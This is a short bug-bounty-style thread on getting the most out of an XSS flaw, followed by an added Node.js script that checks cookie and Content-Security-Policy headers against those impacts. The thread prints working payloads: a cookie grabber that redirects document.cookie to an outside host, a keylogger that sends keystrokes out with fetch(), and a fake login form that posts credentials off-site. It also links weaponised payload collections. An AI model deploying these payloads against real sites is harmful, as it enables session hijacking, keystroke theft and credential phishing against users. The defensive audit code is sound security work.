Here are a few ways to make the most of an XSS. Comment if you can think of some other ideas or resources! Thread.

Grab the victim's cookies by redirecting to an attacker's server and appending the cookie value, e.g.
document.location='https://bugcrowd.com/?'+document.cookie
Perform a sensitive action as the victim user (such as changing their password or email address). Having an XSS allows you to bypass SOP and Anti-CSRF mechanisms. See here for some payloads + inspiration: https://github.com/hakluke/weaponised-XSS-payloads
Plant a JavaScript keylogger (from https://github.com/swisskyrepo/PayloadsAllTheThings)
<img src=x onerror='document.onkeypress=function(e){fetch("http://bugcrowd.com?k="+String.fromCharCode(e.which))},this.remove();'>
Redress the window with a fake HTML login form to phish credentials:
document.body.innerHTML = "<form action='https://bugcrowd.com'><input type='text' value='email' name='email'><input type='password' value='password' name='password'><input type='submit'></form>"
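
From the defender's side, an added example that is not part of the original thread: a small Node.js audit that checks a response's `Set-Cookie` and `Content-Security-Policy` headers against the impacts listed above (script-readable cookies, `fetch()` exfiltration, forms posting off-origin, inline `onerror` handlers). The header values and function names are constructed for illustration.

```javascript
// Added example: audits constructed response headers against the XSS
// impacts listed in the thread. All header values below are sample data.

// Parse a CSP header into a Map of directive -> source list (first wins).
function parseCsp(csp) {
  const map = new Map();
  for (const part of (csp || "").split(";")) {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name && !map.has(name.toLowerCase())) map.set(name.toLowerCase(), values);
  }
  return map;
}

// Cookies without the HttpOnly attribute are visible to document.cookie.
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !h.split(";").slice(1).some((a) => a.trim().toLowerCase() === "httponly"))
    .map((h) => h.split("=")[0].trim());
}

function auditXssImpact(headers) {
  const csp = parseCsp(headers["content-security-policy"]);
  const findings = [];
  const readable = scriptReadableCookies(headers["set-cookie"] || []);
  if (readable.length) findings.push("cookies readable by script: " + readable.join(", "));
  // fetch() is governed by connect-src, which falls back to default-src.
  const connect = csp.get("connect-src") || csp.get("default-src");
  if (!connect || connect.includes("*")) findings.push("fetch() to any origin allowed");
  // form-action has no default-src fallback, so it must be set explicitly.
  const formAction = csp.get("form-action");
  if (!formAction || formAction.includes("*")) findings.push("forms may submit to any origin");
  // Simplified check: inline handlers such as onerror= run when no script
  // policy exists or it lists 'unsafe-inline' (nonce/hash handling omitted).
  const script = csp.get("script-src") || csp.get("default-src");
  if (!script || script.includes("'unsafe-inline'")) findings.push("inline event handlers allowed");
  return findings;
}

const weak = { "set-cookie": ["session=abc123; Path=/; Secure", "theme=dark; Path=/"] };
const hardened = {
  "set-cookie": ["session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"],
  "content-security-policy": "default-src 'self'; script-src 'self'; form-action 'self'",
};
console.log(auditXssImpact(weak));
console.log(auditXssImpact(hardened));
```

Same-origin requests made by injected script (performing actions as the victim) still pass a `'self'` policy, so these headers limit the impact rather than replace fixing the injection point.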